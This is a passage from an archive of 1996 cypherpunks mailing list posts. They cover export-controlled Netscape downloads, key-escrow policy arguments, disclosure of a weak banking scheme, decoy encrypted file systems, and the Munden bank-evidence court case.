>    Public Key at:  http://www.clark.net/pub/charley/cp_1.htm

Seriously, Charley,

We're just a bunch of people who work downtown (for the most part) who're
interested in things financial and internet, with a focus on financial
cryptography (for the most part).

Most of us wear suits to work, so getting past the Harvard Club dress code
for lunch isn't that a big deal. Besides, the view is nice, and $27.50 once
a month (besides the obligatory rubber chicken, it pays for the speaker's
lunch, the room, and whatever A/V the speaker needs) never killed anyone
with a *job* (like, say, *yours*?). Hell, Charley, I bet even *your* boss
wears a suit to work. Or maybe your boss's boss... :-).

To quote Tom Wolfe quoting Chuck Yeager in "The Right Stuff" (in a
discussion of flying and driving fast and drinking and screwing and
hell-raising and flying, I believe), "I wouldn't recommend it, mind you,
but it *can* be done." Wearing a suit and talking crypto, I mean.

You ought to try it. It *can* be done. If people like Perry, and Duncan,
and Futplex, and Kent Borg, and Adam Shostack, and Carl Ellison and,
someday, Unicorn (who threatens to, just about every month, even though he
probably wears a suit already, wherever he is) can, you can, too.

<Sorry if I forgot any others. The point is, there are lots of cypherpunk
DCSB members. Of the hundred or so on the e-mail list, I bet 30 or so are
also subscribed to cypherpunks.>

Consider it an opportunity to see if the ol' interview suit fits. If it
doesn't, Charley, don't forget to save up for that next one. After all,
after working at a place like Booz Allen, it's all downhill, right?  The
next job you get recruited for may not come with that nifty clothing
allowance.

;-)

Cheers,
Bob Hettinga
Moderator,
The Digital Commerce Society of Boston





-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 18 Jul 1996 08:41:33 +0800
To: jsw@netscape.com
Subject: Re: Netscape download requirements
In-Reply-To: <31EB61E5.520E@netscape.com>
Message-ID: <199607161436.JAA27358@homeport.org>
MIME-Version: 1.0
Content-Type: text


First off, I applaud Netscape for making the US version available for
download.  All of my comments here should be taken as questioning the
why's, not suggesting that the implementation is so onerous Netscape
shouldn't have done it.  Although, you might want to add a link to a
page decrying the kafka-esque experience; perhaps Matt's 'My life as
an arms smuggler?'

My question is, under what lawful authority would you release the
data?  The ITARs don't seem to contain anything special, so would you
hand out lists on a subpeona?  Individual names on a subpeona?  Lists
on a warrant?

Incidentally, they seem to be doing a credit check sort of
verification; I gave a decade old address, and it worked fine.  I feel
free to do this because I'm legally entitled to download strong crypto
software, and see no need to hand out my unlisted phone number in
doing so.

Adam

Jeff Weinstein wrote:

|   The Department of State tells us that permission was granted to
| MIT and others under the "old policy".  The "new policy" has not
| been completed, which led to long delays in our getting approval.
| Our current approval is temporary, pending release of the "new
| policy".  In order to get this permission we agreed to ask for and
| archive this information, in case law enforcement required it for
| some related investigation.  The following statement is at the
| bottom of the page, near the submit button:
| 
| 	ALL SUBMISSIONS ARE LOGGED
|         Misrepresentation or omission of facts is covered under
| 	ITAR 127.2(a) and (b)(13).
| 	These data will only be released to satisfy lawful requests by
| 	government agencies, should such requests be made.
| 
|   That last sentance means that we won't be selling the list to
| telemarketers, or making it publicly available.
| 
|   If you are not comfortable providing this information, then you
| may either run the export version, or purchase the retail navigator
| package, which also includes the US only version when sold in the US.
| 
| 	--Jeff
| 
| -- 
| Jeff Weinstein - Electronic Munitions Specialist
| Netscape Communication Corporation
| jsw@netscape.com - http://home.netscape.com/people/jsw
| Any opinions expressed above are mine.
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 18 Jul 1996 09:34:41 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Sternlight on C'punks
Message-ID: <199607161339.JAA01263@nrk.com>
MIME-Version: 1.0
Content-Type: text


From: maldrich@grci.com
> (note that Sternlight actually had his OWN usenet newsgroup), there's the
> fear that DS will start a flame thrower exchange with anyone, regardless
> of topic.  AND, he'll keep posting about it.  Relentlessly. 

The solution to SternFUD infection is patience. Every single time,
he gets bored & lonely after everyone kill-files him. Then he
goes in remission [or maybe it's back to the SternFord Clinic...]
for weeks; reappearing somewhere else.

> God bless 'em, but it's time to add another line to the c'punks
> net.loon warning file.

Sure! But I'd not think that anyone here needed to be warned. 
Hell, even reporters know about him....



-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@megasoft.com>
Date: Thu, 18 Jul 1996 11:19:02 +0800
To: Lyal Collins <lyalc@ozemail.com.au>
Subject: Re: Cybank breaks new ground; rejects public-key encryption
In-Reply-To: <v03007606ae0dd5274a4e@[199.0.65.105]>
Message-ID: <199607161345.JAA08175@research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Lyal" == Lyal Collins <lyalc@ozemail.com.au> writes:

Lyal> I hesitate to distribute the discomplied source code I used,
Lyal> asince it may get used by the unscrupulous to do trusting Cybank
Lyal> customers out of their hard earned money. Maybe, enough
Lyal> resquests will convince me otherwise.

People need to learn that the sort of snake oil that is being sold as
"secure" just won't cut it. Your concern for the customers of Cybank
is valid, however, so I propose something along these lines:

Announce, very publicly, such that every Cybanlk customer would hear
about it in time, that you have cracked their hokey little non-crypto
scheme, and that you intend to publish your work in a full-disclosure
paper to be published on Month Day, Year. I would recommend a number
of appropriate newsgroups, relevant mailing lists (individually
posted, not CC'd), and some letters to the editor of the New York
Times, San Jose Mercury News, the Wall Street Journal and other
high-readership papers. As soon as someone in the media carries it,
it'll spread like wildfire.

Further, I would recommend some guidelines about when to post the
published paper (and I would do it on a number of FTP sites as close
to simultaneous as you can.) Do it on a Monday, so there are plenty of
business days for Cybank to deal with it when the initial round of bad
guys trying the attack will strike. Do it between 1100 and 1700 ET, so
that you do it during business hours.

-- 
C Matthew Curtin        MEGASOFT, LLC        Director, Security Architecture
cmcurtin@research.megasoft.com   http://www.research.megasoft.com/~cmcurtin/
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sparks@bah.com (Charley Sparks)
Date: Thu, 18 Jul 1996 07:30:59 +0800
To: cypherpunks@toad.com
Subject: Stego Software
Message-ID: <v01540b01ae114d32d47e@[156.80.183.210]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

cypherpunks@toad.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMeudE+J+JZd/Y4yVAQFk1gQKA34V+zLw4kfr2kGFy4mLIVQ64cvY6LIo
hnqAbX83gIkIgyDcs7DTEpwcanxsdGM4b0ggulvuAFJVPv3VgkK3iw/9lXhEeswG
UA6En0v0s9apR5JFGiGIqSnqRt11X+jehgSLMDI/IVALazn9SE9bbw03osv4xF33
Lh/Z7HOKS4071g==
=SjHE
-----END PGP SIGNATURE-----

                      Charles E. Sparks
                    Booz Allen & Hamilton
         http://www.clark.net/pub/charley/index.htm
           In God we trust, All Others we encrypt
   Public Key at:  http://www.clark.net/pub/charley/cp_1.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: C Matthew Curtin <cmcurtin@megasoft.com>
Date: Thu, 18 Jul 1996 02:18:57 +0800
To: wb8foz@nrk.com
Subject: Re: Chancellor Group (symbol = CHAG)
In-Reply-To: <Pine.LNX.3.93.960713015840.14684C-100000@redhat.com>
Message-ID: <199607161356.JAA08263@research.megasoft.com>
MIME-Version: 1.0
Content-Type: text/plain



For the web-impared interested in complaining to the SEC about the
twits who keep sending us "big invenstment secrets," I submit the
following, from http://www.sec.gov/consumer/seefraud.htm

Seen a Potential On-Line Fraud?
Tell Us About It!

We want to hear about securities fraud appearing on-line, by telephone or in the mail. The specialists in the SEC's
Office of Investor Education and Assistance can also answer your questions or help you to try to resolve your
complaints. 

You can reach the SEC by calling (202) 942-7040 or by visiting our web site at www.sec.gov. Look for our e-mail
address, which will appear shortly. 

You can also write to: 

     Securities and Exchange Commission
     Office of Investor Education & Assistance
     450 Fifth Street, N.W. Mail Stop 11-2
     Washington, D.C. 20549 

If you have seen a potential on-line investment fraud, call the SEC's Internet Fraud Hotline at (202) 942-4647. 

To reach your state securities regulator, check our state government section, in your phone book, or call the North
American Securities Administrators Association (NASAA), Inc. at (202) 737-0900 

-- 
C Matthew Curtin        MEGASOFT, LLC        Director, Security Architecture
cmcurtin@research.megasoft.com   http://www.research.megasoft.com/~cmcurtin/
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Thu, 18 Jul 1996 00:14:29 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Chancellor Group (symbol = CHAG) (new data)
Message-ID: <199607161423.KAA01466@nrk.com>
MIME-Version: 1.0
Content-Type: text


The SEC already is aware of this ahem activity.

They are looking into it. If you have further data, direct it
to Al Lapins of "OIEA" at the SEC.....

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Thu, 18 Jul 1996 00:07:10 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Opiated file systems
In-Reply-To: <Pine.LNX.3.94.960716090027.5360D-100000@switch.sp.org>
Message-ID: <Pine.SCO.3.93.960716103725.10319B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Jul 1996, The Deviant wrote:
> Mark Aldrich wrote:
> > The payload of getting false data out of a crypto algorithm, such that the
> > data looks "real", when a duress key is input to the algorithm is not
> > something that I've seen approached in any reasonable manner.  Probably
> > because it's just too damn hard and the notion of "real looking" data is a
> > little hard to define scientifically.  A combination stego/crypto solution
> > may be more appropriate, but close examination of the box is going to
> > reveal what happened (assuming the desired solution must withstand some
> > protracted forensics?).  The nuke_the_data or nuke_the_keys solutions are
> > easier to do, and have been implemented in several situations of which I
> > am aware.  
> > 
> 
> But, on the other hand, it wouldn't be to hard to have the user set both
> keys (yeah, so that didn't actually say anything, so what...), and then do
> an every-other-byte type thing (although that would be slow... every other
> block would be more efficient), and have 2 EFS's in one file, and make it
> so that on the "duress" one the extra space appears to be "free".
> 
> One could make it a real file system, and add a fake disk error to prevent
> over-writing of the "non-duress" filesystem.
> 

One problem, however, would be how to keep the "decoy" data, accessible
with only the ambush key, "fresh" in that it must undergo a certain amount
of
turbulence to appear real.  The two file systems would essentially have to
mirror each other, one with the juicy bits and one with the decoy bits.
It would seem to be practically impossible to just build two file systems
as one would 'disappear' when only the ambush key was used.  Wouldn't it
be sort of obvious that something was wrong if half the disk vanished?

> > |the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
> 
> This will sound odd, but did you know that "dockmaster" was the name of
> the NSA's first unclassified computer? just wondering.... ;)
> 

It's not odd at all.  That account is, indeed, on the NSA's unclassified
system.  In my work, I sometimes support vendors taking products through
the NCSC evaluation cycle.  The dockmaster box is the place where the EPL
records and other vendor materials are exchanged and/or published.
Dockmaster accounts are available for anyone who works in the INFOSEC
field, including private individuals.  Quite honestly, it's of little use
(the OS sucks) unless you need up to the minute EPL and/or common criteria
stuff, etc.

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 18 Jul 1996 09:23:20 +0800
To: David Sternlight <david@sternlight.com>
Subject: Re: Sternlight on C'punks
In-Reply-To: <v03007602ae109d824fba@[192.187.162.15]>
Message-ID: <199607161754.KAA25543@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>And another thing. The reason I've not joined this group earlier had
>nothing to do with "worthy". It was because after discussion a year or so
>ago, Tim May suggested to me via e-mail that it would just generate a lot
>of controversy, at a time when people were so polarized that they couldn't
>hear each other and thus my presence here would serve no useful purpose.  I
>took Tim's advice and stayed out.
>

frankly I think a mailing list that can't tolerate informed
but  dissenting views such as your own without self-destructing has
an inherent problem that exists independent of your participation.
perhaps it is a valuable public service to expose such a flaw. at
least, that's the hacker spirit. as for TCM recommending you not
join, I'm disappointed to hear anyone so ostensibly and vocally
committed to free speech would tell anyone that their presence
would be "disruptive" or "controversial" and recommend against it.

>I thought that by now the more extreme dogmatists among you would have
>matured, especially given the evidence generated by the real world about
>how things are and are going if nothing rational and effective is done to
>stop it. Some of you have met me at Crypto and found I'm not the devil
>incarnate. Some of you know that we share many (but not all) policy views
>in common.

well, I find you to have mellowed yourself after a legendary amount
of back and forth in cyberspace, although I would still consider
some of your own views "dogmatic" as you term it.

>
>The presenting symptom for my joining now was a copy of a post by an MIT
>professor I respect to this group, which a colleague sent me. Perhaps I was
>too hasty in my belief that we can begin to hear each other.

I personally find your GAK positions superior to those of the
administration, at least, although that's almost the lowest-common
denominator litmus test for not starting massive flamewars on the 
list.

a suggestion: get a pseudonym! if you only care about debate, you
can debate to your heart's content through it. it's trivial in
cyberspace. if, however, you want your posts to accrue to your
"true name" because you are uptight about maximizing your "reputation",
then this won't work. imho, it does separate the men from the boys
in some ways, the way people use and deal with pseudonymity.
do they openly advocate it yet fall back on ideas of "true names"
randomly relative to it? do they play games like relentlessly try
to connect-the-dots of pseudonyms to "true names" via their speculation
or whatever? do they feel they have to defend their pseudonym's posts
as much as they would those under their so-called "real" name?
all signs of cyberspatial immaturity imho.  

in fact as I understand it, from the fragments of legends tossed around here,
this is all what caused Detweiler to self-destruct,
when his neurons melted down from contemplating the ramifications
of pseudonymity. yet you can see signs of "pseudoparanoia" 
even among the most "respectable" here.

"there is no limit to what a man can accomplish if he doesn't
insist on getting credit"...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Thu, 18 Jul 1996 02:38:06 +0800
To: cypherpunks@toad.com
Subject: COMMUNITY CONNEXION ANNOUNCES STRONGHOLD VERSION 1.2
Message-ID: <199607161757.KAA02868@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


For Immediate Release - July 16, 1996
Contact: Sameer Parekh 510-986-8770

	       COMMUNITY CONNEXION ANNOUNCES STRONGHOLD
			     VERSION 1.2

Oakland, CA - Community ConneXion, Inc., the leader in uncompromising
security for the World Wide Web, today announced the release of its
newest version of Stronghold: Apache-SSL for the US. Stronghold is a
webserver based on the popular Apache server, which has the highest
marketshare of all webservers on the Internet according to the
Netcraft server survey at http://www.netcraft.com/survey/.
Stronghold's marketshare has more than doubled every month since its
release in January of this year.

"[The competition]'s secure servers just didn't work the way we wanted
them to; the interface was clunky and required firewall adjustments to
run, the access control didn't work well for us, and it was just too
black-boxey for us," commented Dan Kearns, of the Motorola ISG
Internet Business Group. "We like the lean/mean-ness of Apache in
general, and the actual useful development that goes on. We look
forward to generating client certificates for our channel partners
using the bundled internal certificate authority tools."

"We have been working with Community ConneXion for over a year to
enable our Digital IDs in their Stronghold server products," said Greg
Smirin, Product Line Manager at VeriSign, Inc. "We look forward to
using their new version of Stronghold to demonstrate client
certification on our own website." VeriSign is the leading provider of
digital authentication services and products for electronic commerce
and other forms of secure communications.

"Stronghold is the first widely used web server that can authenticate
clients on the basis of their digital certificates," said Dr. Andrew
Csinger, President of Xcert Software, Inc.  "Stronghold is a natural
server platform for Xcert's Sentry suite of security enhancement
products.  The combination of Stronghold's uncompromising security
profile and Xcert's flexible certificate management and secure
database technology represents great value and convenience for
Internet users."

Xcert and C2 have entered into a co-marketing agreement to provide
easy access to the Stronghold/Sentry bundle.  The Stronghold/Sentry
combination puts organizations of any size in control of their own
security, allowing them to cost-effectively implement secure Intranets
based on public key certificates.

Xcert Software, Inc. is the premier provider of security enhancement
software for safe and secure commercial Internet applications.
Xcert's Sentry product line is the first cross-platform,
server-independent public key infrastructure implementation.  A live
demonstration using the Stronghold webserver has been available on the
company's website since April 1996 (http://www.xcert.com).

Because it is based on Apache, Stronghold can be used with the
innummerable third party CGI and Apache API applications which have
been developed for Apache, including perl & python integration,
database connectivity, and Kerberos support. "Direct support within
the server for scripting languages can produce an excellent
performance improvement over standard CGI methods," said Sameer
Parekh, President of Community ConneXion, Inc.

Community ConneXion ships binaries for Sparc Solaris 2.5, x86 Solaris
2.5, Sparc SunOS 4.1.3_U1, DG/UX, FreeBSD 2.1, BSDI 1.1, AIX 3.2.5,
IRIX 5.3, HP/UX (9 & 10), OSF/1, UnixWare, Ultrix, BSDI 2.0, and Linux
(ELF & a.out). Additional platforms may be supported on request.
Stronghold may be ordered and downloaded at http://www.us.apache-ssl.com/.

Portions developed by the Apache Group, taken with permission from the
Apache Server http://www.apache.org/.  This product includes software
developed by Ben Laurie for use in the Apache-SSL HTTP server project.
This product includes software developed by Eric Young
(eay@mincom.oz.au).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 18 Jul 1996 09:47:02 +0800
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: Surf-filter lists
In-Reply-To: <199607160541.BAA11900@yakko.cs.wmich.edu>
Message-ID: <199607161804.LAA26399@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>Vlad: How can consumers make an informed decision as to which filter
>they wish to purchase, if they are not told exactly what information
>each product is filtering out?
>
>Meeks et al may be guilty of flamboyant, emotionalistic prose, but I
>find the concept that the public is expected to buy various filters
>without knowing what they filter...frankly, ridiculous.

there's significant ambiguity in your language. what actually constitutes 
knowing or not knowing what is being filtered?

Meeks discussed a case where the software clearly gave *categories*
of what it filtered, and I think he focused on a case where it
was clear that it was borderline (the monkey with the eye poked
out). in other words, it did appear to me that the software &raters
were working exactly as they were supposed to, and he was hilighting
a borderline case. moreover, the categories were clear: "gratuitous
depictions of violence" or whatever. for *some* consumers, knowledge
of these *categories* is going to be enough. other consumers
are going to be more wary and want to make sure that the actual
sites blocked correspond to the categories stated.

in general, though, I think many consumers do not want to know
in exact detail what specific web sites are being blocked. that's
what they're paying the company for: to hide that information from
them in a sense so they don't have to deal with the complexity of
it.

my position could be misconstrued. it is: let the consumer *decide*.
this is already happening. they are putting their money where they
think superior services are. what Meeks has discovered is a new
criteria that customers *may* want to pay more attention to: how
well what the companies "say" they are doing matches what they
are actually blocking. but then again, consumers are always going
to have to place some amount of trust in these companies. the
market is in the process of deciding right now.

Meeks seems to have the opinion, "the site-blocking software is
not legitimate unless they fully publicize their lists". this
is a decision the market will make. I fully expect that both
types of services will flourish in the future (open and closed
lists), and each have their particular roles and areas of specialty.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yap Remailer <remailer@yap.pactitle.com>
Date: Thu, 18 Jul 1996 01:40:10 +0800
To: cypherpunks@toad.com
Subject: Re: Seek-and-Destroy
In-Reply-To: <Pine.LNX.3.93.960715161736.171A-100000@smoke.suba.com>
Message-ID: <199607161805.LAA07334@yap.pactitle.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: snow <snow@smoke.suba.com>
> Date: Mon, 15 Jul 1996 16:20:54 -0500 (CDT)
> 
> On Mon, 15 Jul 1996, Declan McCullagh wrote:
> 
> > Do NOT visit:
> >   http://xxx.lanl.gov/seek-and-destroy
> 
>      So of course I did. Very Interesting. 
>     
>      Those guys *rock*.

What do you mean very interesting?  It was a total let down.  It
counted down for ten minutes and then that was it.  I was hoping to
get syn-bomed or bombarded with IP fragments or something.

Very disappointing.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 18 Jul 1996 08:34:39 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
Message-ID: <199607161818.LAA14032@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:47 PM 7/15/96 -0700, David Sternlight wrote:


>>Despite trying to hide behind the smokescreen of calling the
>>government's GAK position "voluntary," we all know that they are trying to
>>misuse their influence to gently force us to use GAK, if by no other means
>>that forcing the taxpayer to pay for the system as they have done already.
>
>I agree, though I would not have phrased it in such an offensive way. 

Please explain why you think my comment above is phrased "in such an 
offensive way."  Hint:  If I'd really wanted it to be "offensive," I could 
have easily done that.


>This isn't some conspiracy of evil but people with a legitimate policy
>disagreement.

I notice your insertion of the term "legitimate."  As opposed to what?  Do 
you mean that you acknowledge that there is such a thing as an ILLEGITIMATE 
policy disagreement?  How can we tell the difference?

And there goes that word, "policy," again!  Containing with it, the 
assumption that governments (despite ostensible freedom of speech) have some 
sort of authority to regulate encryption.


>>The opponents of GAK, on the other hand, are not denying to anyone the
>right
>>to implement a truly voluntary "key-escrow" system, or more likely many
>>privately operating ones.
>
>I disagree again. It is evident from the effort to shoot down Clipper I,
>which WAS voluntary, that this is another case of your version of
>"voluntary". If an offeror, even the government, offers something voluntary
>and you don't like it, you attempt to suppress it. It's kinda like "freedom
>of speech only for those who agree with me".

Huh?  Developed in secret (secrecy, not merely for the technical details, 
but also for the broad overall concept:  the former might have been 
justifiable to some people, the latter was not!), using stolen tax dollars, 
and presented as a fait accompli to the public.  Oh, one more thing:  
Apparently designed to NOT be able to talk to non-escrowed encryption 
systems, in an obvious attempt to freeze out competition.  The government 
was trying to misuse its influence here.

Obviously some new strange usage of the word "voluntary" that I wasn't 
previously aware of.

>> However, such systems will be a service for the
>>customer, not the government, and the key will almost certainly not be
>>provided to the government on request, and in fact the key will likely be
>>stored in an encrypted form that the government won't be able to use.
>
>To the contrary, business records are always available on legitimate
>subpoena by the government,

There you go again with that word, "legitimate."  Give me an example of an 
"_illegitimate subpoena_," will you?  One that someone is not obligated to 
fulfill.  What?!?  You can't?   Then why did you use the term in what is 
obviously (to you) a redundant fashion?


> and this would include escrowed keys. YOU don't
>have to like it, but it's the law.

Not currently it isn't.  Laws concerning "escrowed keys" haven't been 
written, and in any case since they don't have to be stored in the same 
legal jurisdiction, cooperation with a given set of authorities is not only 
not guaranteed, but isn't wise.   

Besides, the only thing I see in the US Constitution which compels a 
person's participation in and cooperation with a trial is a right of 
defendants to have witnesses appear in their _defense._  I see no 
corresponding right on the part of the prosecution to compel ITS witnesses 
to appear.

And you ignored the part about the ENCRYPTED stored keys.  If they're 
encrypted, then even if they're presented to the police, they won't be able 
to use them, law or no law.  Given a choice, I think most people would 
prefer to use an "escrow agent" (if they chose to use one at all; which I 
doubt) that is either guaranteed to be uncooperative to the government, or 
one which CAN'T be cooperative, because the material it has is not in a form 
useful to the cops.  As long as key-escrow is TRULY "voluntary," in the 
broadest and most accurate sense of the word, market forces will migrate to 
a practice which is best for individual customers as individuals.


>>Quite simply, we do not require your "assent."  You should be trying to get
>>OURS.
>
>"Silence does not constitute assent" to your personal attacks, your policy
>assertions, and what I think to be your misrepresentations of fact. I was
>not speaking of assent to GAK in that sentence.
>
>I think your attempt to pseudospeciate me and create an "us and him"
>situation in this group is bound to fail with those who have paid attention
>to what I think and say, particularly my most recent thinking. On many
>matters we are agreed at bottom. However, I place high value on policy

There you go again with the word, "policy."


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 18 Jul 1996 09:20:54 +0800
To: cypherpunks@toad.com
Subject: UK privacy case: Munden
Message-ID: <199607161822.LAA28177@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


interesting story I hadn't heard before. this guy
complained about a bad bank balance and went to jail for
it. touches issues such as security of bank software,
government oppression, crypto, judicial evidence legality, etc.

------- Forwarded Message

Date: Thu, 11 Jul 1996 04:38:27 -0700 (PDT)
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: John Munden freed
X-URL: http://communication.ucsd.edu/pagre/rre.html


[This case is so outrageous that it wouldn't even work as a "Dilbert" strip.
Fortunately the guy is now free, having had his life ruined for complaining
about the theft of his bank deposits.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Wed, 10 Jul 1996 11:00:11 -0800
From: Jon Callas <jon@worldbenders.com>
To: "The Eristocracy" <Eristocracy@mv.mv.com>
Subject: Munden set free

[Editor's note: I sent out an article about the Munden case when it was
current -- in late '94. For those who don't remember, John Munden is a British
policeman who was jailed for complaining about his bank balance being wrong.
No, you didn't read that incorrectly. Read on for more details. I certainly
hope that the next chapter will be some sort of restitution paid to Munden. --
jdcc]

Date: Tue, 09 Jul 1996 12:13:28 +0100
From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
To: set-discuss@commerce.net
Subject: Important UK court case

+----------------------------------------------------+
Addressed to: set-discuss@commerce.net
+----------------------------------------------------+

At a trial in England yesterday, a judge decided that if a bank was
not prepared to let their computer systems be examined by a hostile
expert witness, then they could not even present bank statements
in evidence.

At least SET has been done right - I believe it is the first
significant banking protocol to have undergone an open design
review. I hope that there will be implementations that have also
undergone credible scrutiny.

I append a note of the case that I posted to our supporters.

Ross Anderson


*********************************************************************

John Munden is acquitted at last!

At twenty past two today, John Munden walked free from Bury Crown
Court. This resolved a serious miscarriage of justice, and ended an
ordeal for John and his family that has lasted almost four years.

In a judgment loaded with significance for the evidential value of
cryptography and secure systems generally, His Honour Justice John
Turner, sitting with two assessors, said that when a case turns on
computers or similar equipment then, as a matter of common justice,
the defence must have access to test and see whether there is anything
making the computers fallible. In the absence of such access, the
court would not allow any evidence emanating from computers.

As a result of this ruling, the prosecution was not in a position to
proceed, and John Munden was acquitted.

John was one of our local policemen, stationed at Bottisham in the
Cambridge fenland, with nineteen years' service and a number of
commendations. His ordeal started in September 1992 when he returned
from holiday in Greece and found his account at the Halifax empty. He
complained and was told that since the Halifax had comfidence in the
security of its computer system, he must be mistaken or lying. When
he persisted, the Halifax reported him to the police complaints
authority for attempted fraud; and in a trial whose verdict caused
great surprise, he was convicted at Mildenhall Magistrates' Court on
the 12th February 1994.

I told the story of this trial in a post to comp.risks (see number
15.54 or get ftp.cl.cam.ac.uk/users/rja14/post.munden1).  It turned
out that almost none of the Halifax's `unresolved' transactions were
investigated; they had no security manager or formal quality assurance
programme; they had never heard of ITSEC; PIN encryption was done in
software on their mainframe rather than using the industry-standard
encryption hardware, and their technical manager persisted in claiming
(despite being challenged) that their system programmers were unable
to get at the keys. Having heard all this, I closed my own account at
the Halifax forthwith and moved my money somewhere I hope is safer.

But their worships saw fit to convict John.

An appeal was lodged, but just before it was due to be heard - in
December 1994 - the prosecution handed us a lengthy `expert' report by
the Halifax's accountants claiming that their systems were secure.
This was confused, even over basic cryptology, but it was a fat and
glossy book written by a `big six' firm with complete access to the
Halifax's systems - so it might have made an impression on the court.
We therefore applied for, and got, an adjournment and an order giving
me - as the defence expert witness - `access to the Halifax Building
Society's computer systems, records and operational procedures'.

We tried for nine months to enforce this but got nowhere. We
complained, and the judge ordered that all prosecution computer
evidence be barred from the appeal. The Crown Prosecution Service
nonetheless refused to throw in the towel, and they tried to present
output such as bank statements when the appeal was finally heard
today.

However, the judge would have none of it.

For the computer security community, the moral is clear: if you are
designing a system whose functions include providing evidence, it had
better be able to withstand hostile review.

Ross

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This message was sent by set-discuss@commerce.net.  For a complete listing
of available commands, please send mail to 'majordomo@commerce.net'
with 'help' (no quotations) contained within the body of your message.

- - --- end forwarded text


- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Thu, 18 Jul 1996 07:45:16 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: US versions of Netscape now available
In-Reply-To: <2.2.32.19960716103638.00835c08@panix.com>
Message-ID: <31EBE5F3.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Duncan Frissell wrote:
> 
> I'm glad too.  So how many minutes did it take to leak overseas?

I have heard no reports of it leaking overseas.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Pekelney <pekelney@rspeng.com> (by way of Bruce Schneier)
